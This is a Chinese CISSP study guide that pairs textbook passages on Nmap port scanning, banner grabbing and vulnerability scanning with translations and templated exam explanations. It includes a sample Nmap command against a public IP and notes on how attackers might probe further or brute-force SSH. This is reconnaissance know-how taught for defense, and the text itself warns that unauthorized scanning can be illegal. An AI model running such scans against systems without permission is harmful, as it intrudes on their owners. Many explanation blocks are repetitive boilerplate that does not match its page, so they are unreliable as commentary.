场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1043 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 16 / PDF P1044

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Figure 15.1 shows an example of Nmap at work. The user entered the following command at a Linux prompt: nmap –vv 52.4.85.159 To interpret these results, you must know the use of common network ports as discussed in Chapter 12, “Secure Communications and Network Attacks.” (You'll also find a reference listing of common ports later in this chapter.) Let's walk through the results of this Nmap scan: The first line of the port listing, 22/tcp open ssh, indicates that the system accepts connections on TCP port 22. The Secure Shell (SSH) service uses this port to allow administrative connections to servers.

The second line of the port listing, 80/tcp closed http, indicates that a firewall rule exists to allow access to port 80 but no service is listening on that port. Port 80 is used by HTTP to accept unencrypted web server connections. The final line of the port listing, 443/tcp open https, indicates that the system is accepting connection requests on port 443, which is used by HTTPS to deliver web pages over encrypted connections, a secure alternative to the use of unencrypted connections over port 80.

中文直译 / 整理

图 15.1展示了 Nmap 的工作示例。 用户在 Linux 命令提示符下输入了以 下命令: nmap –vv 52.4.85.159 要解释这些结果,您必须了解常见的网络端口的用途,详见第12章,“安全通 信与网络攻击。 ”(您还会在本章后面找到常见端口的参考列表。 )让我们逐 步分析此Nmap扫描的结果: 端口列表的第一行,22/tcp open ssh,表示该系统接受TCP端口22上 的连接。 安全壳(SSH)服务使用此端口允许对服务器进行管理连接。 端口列表的第二行,80/tcp closed http,表示存在防火墙规则允许访问 端口80,但该端口上没有服务在监听。 端口80由HTTP使用,用于接受 未加密的Web服务器连接。 端口列表的最后一行,443/tcp open https,表明该系统正在接受端口 443 上的连接请求,HTTPS 使用该端口通过加密连接提供网页,这是相 对于使用端口 80 进行未加密连接的一种安全替代方案。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 17 / PDF P1045

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

FIGURE 15.1 Nmap scan of a web server run from a Linux system What can we learn from these results? The system being scanned is probably a web server that is openly accepting connection requests from the scanned system. The firewalls between the scanner and this system are configured to allow both secure (port 443) and insecure (port 80) connections, but the server is not set up to actually allow unencrypted transactions. The server also has an administrative port open that may allow command-line connections.

中文直译 / 整理

图 15.1 在 Linux 系统上运行的 Nmap 扫描 Web 服务器 从这些结果中我们可以学到什么? 被扫描的系统很可能是一个 Web 服务器, 它正在公开接受来自扫描系统的连接请求。 扫描系统与该系统之间的防火墙配 置为允许安全(端口 443)和不安全(端口 80)连接,但服务器并未设置为实 际允许未加密的事务。 该服务器还开放了一个管理端口,可能允许命令行连接。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 18 / PDF P1046

第 1046 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Port scanners, network vulnerability scanners, and web application vulnerability scanners use a technique called banner grabbing to identify the variant and version of a service running on a system. This technique opens a connection to the service and reads the details provided on the welcome screen, or banner, to assist with version fingerprinting. An attacker reading these results would probably make a few observations about the system that would lead to some further probing: Pointing a web browser at this server would likely give a good idea of what the server does and who operates it.

Simply typing the IP address of the system in the address bar of the browser may reveal useful information. Figure 15.2 shows the result of performing this; the site is running a default installation of the Apache web server.

中文直译 / 整理

端口扫描器、网络漏洞扫描器和Web应用程序漏洞扫描器使用一种称为 banner grabbing 的技术来识别系统上运行的服务的变体和版本。 该技术通 过建立与服务的连接并读取欢迎屏幕或横幅中提供的详细信息,以协助进行 版本指纹识别。 攻击者在阅读这些结果时,可能会对系统做出一些观察,从而引发进一步的探 测: 在浏览器中访问此服务器,可能会很好地了解服务器的功能及其运营者。 只需在浏览器的地址栏中输入系统的IP地址,就可能揭示有用的信息。 图 15.2展示了执行此操作的结果; 该网站正在运行Apache网页服务器的默认 安装。

小白解释

场景先行:你是公司的安全负责人,正在读第 1046 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

漏洞扫描:漏洞扫描用工具找已知弱点。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1046 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

扫描发现弱点,不等于已经成功利用。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
漏洞扫描 漏洞扫描用工具找已知弱点。
学习单元 19 / PDF P1047

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

FIGURE 15.2 Default Apache server page running on the server scanned in Figure 15.1 HTTP connections to this server are encrypted. Eavesdropping on those connections is likely not possible. The open SSH port is an interesting finding. An attacker may try to conduct a brute-force password attack against administrative accounts on that port to gain access to the system. In this example, we used Nmap to scan a single system, but the tool also allows scanning entire networks for systems with open ports. The scan shown in Figure 15.3 scans across the 192.168.1.0/24 network, including all addresses in the range 192.168.1.1–192.168.1.254.

中文直译 / 整理

图 15.2 在扫描的服务器上运行的默认 Apache 服务器页面图 15.1 到此服务器的 HTTP 连接已加密。 窃听这些连接很可能无法实现。 开放的SSH端口是一个有趣的发现。 攻击者可能会尝试通过该端口对管理 账户进行暴力破解密码攻击,以获取系统访问权限。 在本示例中,我们使用 Nmap 扫描了单个系统,但该工具还允许扫描整个网络 以查找具有开放端口的系统。 图中所示的扫描图 15.3涵盖了 192.168.1.0/24 网 络,包括范围 192.168.1.1–192.168.1.254 内的所有地址。

小白解释

场景先行:你是公司的安全负责人,正在读第 1047 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
学习单元 20 / PDF P1048

第 1048 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

The fact that you can run a network discovery scan doesn't mean that you may or should run that scan. You should only scan networks where you have explicit, and hopefully written, permission from the network owner to perform security scanning. Some jurisdictions consider unauthorized scanning a violation of computer abuse laws and may prosecute individuals for an act as simple as running Nmap on a coffee shop wireless network.

中文直译 / 整理

您可以运行网络发现扫描,并不意味着您可以或应该运行该扫描。 您仅 应在获得网络所有者明确(最好为书面)许可的情况下扫描网络,以执行安 全扫描。 某些司法管辖区认为未经授权的扫描违反了计算机滥用法律,甚至 可能对在咖啡店无线网络上运行 Nmap 这样简单的行为提起诉讼。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1048 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
学习单元 21 / PDF P1049

第 1049 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

本页 PDF 没有提取到对应文本,可能是图像、页眉或跨页内容。

中文直译 / 整理

本页 PDF 没有提取到对应文本,可能是图像、页眉或跨页内容。

小白解释

场景先行:你是公司的安全负责人,正在读第 1049 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1049 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 22 / PDF P1050

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

FIGURE 15.3 Nmap scan of a large network run from a Mac system using the Terminal utility The netstat command is a useful tool for examining the active ports on a system. This command lists all active network connections on a system as well as those ports that are open and awaiting new connections. Network Vulnerability Scanning Network vulnerability scans go deeper than discovery scans. They don't stop with detecting open ports but continue on to probe a targeted system or network for the presence of known vulnerabilities.

These tools contain databases of thousands of known vulnerabilities, along with tests they can perform to identify whether a system is susceptible to each vulnerability in the system's database. When the scanner tests a system for vulnerabilities, it uses the tests in its database to determine whether a system may contain the vulnerability. In some cases, the scanner may not have enough information to conclusively determine that a vulnerability exists and it reports a vulnerability when there really is no problem. This situation is known as a false positive report and is sometimes seen as a nuisance to system administrators.

Far more dangerous is when the vulnerability scanner misses a vulnerability and fails to alert the administrator to the presence of a dangerous situation. This error is known as a false negative report. Traditional vulnerability scans are unable to detect zero-day vulnerabilities that have not yet been identified by the scanner vendor. You'll learn more about zero-day vulnerabilities in Chapter 17, “Preventing and Responding to Incidents.” By default, network vulnerability scanners run unauthenticated scans. They test the target systems without having passwords or other special information that would grant the scanner special privileges.

This allows the scan to run from the perspective of an attacker but also limits the ability of the scanner to

中文直译 / 整理

图 15.3 在 Mac 系统上使用终端工具进行的大型网络 Nmap 扫描 netstat 命令是检查系统上活动端口的有用工具。 该命令列出系统上所 有活动的网络连接以及处于打开状态并等待新连接的端口。 网络漏洞扫描 网络漏洞扫描 比发现扫描更深入。 它们不仅限于检测开放端口,还会继续探 测目标系统或网络是否存在已知漏洞。 这些工具包含数千个已知漏洞的数据库, 以及可执行的测试,以识别系统是否易受数据库中每个漏洞的影响。 当扫描器测试系统是否存在漏洞时,它会使用数据库中的测试来判断系统是否 可能存在该漏洞。 在某些情况下,扫描器可能没有足够的信息来确凿地确定漏 洞是否存在,因此会报告一个实际上并不存在的问题。 这种情况被称为 误报, 有时会被系统管理员视为烦扰。 更危险的是,漏洞扫描器漏掉了某个漏洞,未 能向管理员发出危险情况的警报。 这种错误被称为 漏报。 传统漏洞扫描无法检测扫描供应商尚未识别的零日漏洞。 您将在第1 7章“事件的预防与响应”中了解更多关于零日漏洞的信息。 默认情况下,网络漏洞扫描器执行未经身份验证的扫描。 它们在没有密码或其 他特殊信息的情况下测试目标系统,而这些信息本可授予扫描器特殊权限。

这 使得扫描能够从攻击者的视角进行,但也限制了扫描器的能力以

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

身份:身份是主体在系统中的标识。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

扫描发现弱点,不等于已经成功利用。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
漏洞扫描 漏洞扫描用工具找已知弱点。
学习单元 23 / PDF P1051

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

fully evaluate possible vulnerabilities. One way to improve the accuracy of the scanning and reduce false positive and false negative reports is to perform authenticated scans of systems. In this approach, the scanner has read-only access to the servers being scanned and can use this access to read configuration information from the target system and use that information when analyzing vulnerability testing results. Figure 15.4 shows the results of a network vulnerability scan performed against the same system subjected to a network discovery scan earlier in this chapter.

FIGURE 15.4 Network vulnerability scan of the same web server that was port scanned in Figure 15.1 The scan results shown in Figure 15.4 are very clean and represent a wellmaintained system. There are no serious vulnerabilities and only two low-risk vulnerabilities related to the SSH service running on the scanned system. The system administrator may wish to tweak the SSH cryptography settings to remove those low-risk vulnerabilities, but this is a very good report for the administrator and provides confidence that the system is well managed.

中文直译 / 整理

全面评估可能的漏洞。 提高扫描准确性并减少误报和漏报的一种方法是执行经 过身份验证的扫描。 在这种方法中,扫描器对被扫描的服务器具有只读访问权 限,并可利用此权限读取目标系统的配置信息,并在分析漏洞测试结果时使用 这些信息。 图 15.4显示了针对本章早前进行网络发现扫描的同一系统执行的网络漏洞扫 描的结果。 图 15.4对本章中端口扫描过的同一Web服务器执行的网络漏洞扫描图 15.1 扫描结果显示在图15.4中非常干净,代表了一个维护良好的系统。 没有严重漏 洞,仅存在两个与扫描系统上运行的SSH服务相关的低风险漏洞。 系统管理员 可能希望调整SSH加密设置以消除这些低风险漏洞,但这份报告对管理员而言 非常理想,表明系统得到了良好管理。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
漏洞扫描 漏洞扫描用工具找已知弱点。
学习单元 24 / PDF P1052

第 1052 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Learning TCP Ports Interpreting port scan results requires knowledge of some common TCP ports. Here are a few that you should commit to memory when preparing for the CISSP exam: FTP: 20/21 SSH: 22 Telnet: 23 SMTP: 25 DNS: 53 HTTP: 80 POP3: 110 NTP: 123 Windows File Sharing: 135, 137–139, 445 HTTPS: 443 LPR/LPD: 515 Microsoft SQL Server: 1433/1434 Oracle: 1521 H.323: 1720 PPTP: 1723 RDP: 3389 HP JetDirect printing: 9100 There are many commercial vulnerability scanning tools available in today's marketplace. The Open Worldwide Application Security Project (OWASP) maintains a comprehensive list at https://owasp.org/wwwcommunity/Vulnerability_Scanning_Tools.

The open source OpenVAS scanner also has a growing community of users.

中文直译 / 整理

学习TCP端口 解释端口扫描结果需要了解一些常见的TCP端口。 以下是准备CISSP考试 时应牢记的几个端口: FTP: 20/21 SSH: 22 Telnet: 23 SMTP: 25 DNS: 53 HTTP: 80 POP3: 110 NTP: 123 Windows 文件共享: 135, 137–139, 445 HTTPS: 443 LPR/LPD: 515 Microsoft SQL Server: 1433/1434 Oracle: 1521 H.323: 1720 PPTP: 1723 RDP: 3389 HP JetDirect 打印: 9100 如今市场上有许多商业漏洞扫描工具。 开放全球应用安全项目(OWASP)维 护了一份全面的列表,地址为https://owasp.org/wwwcommunity/Vulnerability_扫描_工具。 开源的OpenVAS扫描器也拥有不断增长 的用户社区。

小白解释

场景先行:你是公司的安全负责人,正在读第 1052 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

漏洞扫描:漏洞扫描用工具找已知弱点。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1052 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

扫描发现弱点,不等于已经成功利用。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
漏洞扫描 漏洞扫描用工具找已知弱点。
学习单元 25 / PDF P1053

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Organizations may also conduct specialized vulnerability assessments of wireless networks. Aircrack-ng is a tool commonly used to perform these assessments by testing the encryption and other security parameters of wireless networks. It can be used in conjunction with passive monitoring techniques that may identify rogue devices on the network. Web Vulnerability Scanning Web applications pose significant risk to enterprise security. By their nature, the servers running many web applications must expose services to Internet users. Firewalls and other security devices typically contain rules allowing web traffic to pass through to web servers unfettered.

The applications running on web servers are complex and often have privileged access to underlying databases. Attackers often try to exploit these circumstances using SQL injection and other attacks that target flaws in the security design of web applications. You'll find complete coverage of SQL injection attacks, crosssite scripting (XSS), cross-site request forgery (XSRF), and other web application vulnerabilities in Chapter 21, “Malicious Code and Application Attacks.” Web vulnerability scanners are special-purpose tools that scour web applications for known vulnerabilities.

They play an important role in any security testing program because they may discover flaws not visible to network vulnerability scanners. When an administrator runs a web application scan, the tool probes the web application using automated techniques that manipulate inputs and other parameters to identify web vulnerabilities. The tool then provides a report of its findings, often including suggested vulnerability remediation techniques. Figure 15.5 shows an example of a web vulnerability scan. This scan ran against the web application running on the same server as the network discovery scan in Figure 15.1 and the network vulnerability scan in Figure 15.4.

As you read through the scan report in Figure 15.5, notice that it detected vulnerabilities that did not show up in the network vulnerability scan.

中文直译 / 整理

组织还可以对无线网络进行专门的漏洞评估。 Aircrack‑ng 是一种常用于 执行此类评估的工具,它通过测试无线网络的加密和其他安全参数来实现。 它可以与被动监控技术结合使用,以识别网络上的恶意设备。 Web 漏洞扫描 Web 应用程序对企业安全构成重大风险。 由于其特性,运行许多 Web 应用程 序的服务器必须向互联网用户开放服务。 防火墙和其他安全设备通常包含允许 Web 流量无限制通过到 Web 服务器的规则。 运行在 Web 服务器上的应用程 序复杂且通常具有对底层数据库的特权访问权限。 攻击者经常试图利用这些情 况,通过 SQL 注入和其他针对 Web 应用程序安全设计缺陷的攻击手段进行攻 击。 您将在第 21 章“恶意代码和应用程序攻击”中找到有关 SQL 注入攻 击、跨站脚本(XSS)、跨站请求伪造(XSRF)以及其他 Web 应用程序 漏洞的全面介绍。 Web漏洞扫描器是专门用于扫描 Web 应用程序中已知漏洞的工具。 它们 在任何安全测试计划中都扮演着重要角色,因为它们可能发现网络漏洞扫描器 无法察觉的缺陷。

当管理员运行 Web 应用程序扫描时,该工具会使用自动化技 术操纵输入和其他参数来探测 Web 应用程序,以识别 Web 漏洞。 工具随后会 提供一份发现报告,通常包括建议的漏洞修复技术。 图 15.5展示了 Web 漏洞 扫描的一个示例。 此扫描针对与网络发现扫描所在的同一服务器上的 Web 应用 程序运行,该网络发现扫描见图 15.1,网络漏洞扫描见图 15.4。 在阅读图 15.5中的扫描报告时,请注意,它检测到了网络漏洞扫描中未显示的漏洞。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

漏洞评估:漏洞评估偏技术扫描,主要找已知弱点。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

自动化扫描、已知弱点、补洞通常对应 vulnerability assessment。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

